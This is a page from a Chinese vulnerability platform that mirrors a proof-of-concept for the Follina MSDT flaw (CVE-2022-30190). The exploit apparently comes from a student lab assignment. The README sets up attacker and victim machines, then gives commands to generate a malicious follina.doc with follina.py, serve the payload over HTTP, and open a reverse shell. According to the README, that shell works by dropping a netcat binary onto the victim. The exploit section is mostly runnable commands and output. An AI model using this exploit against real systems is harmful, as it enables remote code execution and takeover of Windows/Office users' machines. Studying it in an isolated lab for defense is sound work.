漏洞平台

POC详情： 61184bc869502ff4c2b0902342d2cc0bdf46a3aa

来源

https://github.com/aminetitrofine/CVE-2022-30190

关联漏洞

标题： Microsoft Windows Support Diagnostic Tool 操作系统命令注入漏洞 (CVE-2022-30190)
描述：Microsoft Windows Support Diagnostic Tool是美国微软（Microsoft）公司的收集信息以发送给 Microsoft 支持的工具。 Microsoft Windows Support Diagnostic Tool (MSDT)存在操作系统命令注入漏洞。以下产品和版本受到影响：Windows 10 Version 1809 for 32-bit Systems,Windows 10 Version 1809 for x64-based Systems,Windows

描述

Follina (CVE-2022-30190) is a Microsoft Office zero-day vulnerability that has recently been discovered. It’s a high-severity vulnerability that hackers can leverage for remote code execution (RCE) attacks.

介绍

# CVE 30190

> Amine TITROFINE | December 17, 2022

--------------

Follina (CVE-2022-30190) is a Microsoft Office zero-day vulnerability that has recently been discovered. It’s a high-severity vulnerability that hackers can leverage for remote code execution (RCE) attacks. It exists when MSDT is called using the URL protocol from a calling application such as Word. An attacker who successfully exploits this vulnerability can run arbitrary code with the privileges of the calling application. The attacker can then install programs, view, change, or delete data, or create new accounts in the context allowed by the user’s rights.


# Environnement 
2 VMs :
- **Attacker Machine**
    - kali-linux-2022.3-virtualbox-amd64 ( [Link To Downlaod](https://www.kali.org/get-kali/#kali-virtual-machines) )
- **Victim Machine**
    - Windows 10 (64 bits) ( [Link To Downlaod](https://drive.google.com/file/d/1YidMOwpc2h_wePDiKWeJ40V6oJz2Lhmo/view) )
    - Microsoft Office 2016 Pro ( [Link To Downlaod](https://drive.google.com/drive/folders/1CbTyNSBva6jAKKMPrp7PZlGfCJsYZmEc) )


# Exploit

```
$ git clone https://gitlab.com/grenoble-inp-ensimag/Secu3A/Devoir1/CVE_2022_30190_amine_titrofine_farah_ben_youssef_walid_lanjri.git

$ cd CVE_2022_30190_amine_titrofine_farah_ben_youssef_walid_lanjri

$ python3 follina.py –r 9999
```

After running the follina.py program a ( **follina.doc** )  will appear, this contain a malicious script .

In order to make easy sharing files with the two Vms, we ll use Python http Server
```
$ python3 –m http.server 8080
```
# Examples

Get a reverse shell on port 9999. **Note, this downloads a netcat binary _onto the victim_ and places it in `C:\Windows\Tasks`. It does not clean up the binary. This will trigger antivirus detections unless Antivirus is disabled.**
```
$ python3 follina.py -r 9999
```
Pop `calc.exe`:

```
$ python3 follina.py -c "calc"
[+] copied staging doc /tmp/9mcvbrwo
[+] created maldoc ./follina.doc
[+] serving html payload on :8000
```

Pop `notepad.exe`:

```
$ python3 follina.py -c "notepad"
```

文件快照


 [4.0K]  /data/pocs/61184bc869502ff4c2b0902342d2cc0bdf46a3aa
├── [5.0K]  follina.py
├── [ 44K]  nc64.exe
├── [2.1M]  Rapport_devoir_SSI.pdf
└── [2.0K]  README.md

0 directories, 4 files

神龙机器人已为您缓存

备注

1. 建议优先通过来源进行访问。

2. 如果因为来源失效或无法访问，请发送邮箱到 f.jinxu#gmail.com 索取本地快照（把 # 换成 @）。

3. 神龙已为您对POC代码进行快照，为了长期维护，请考虑为本地POC付费，感谢您的支持。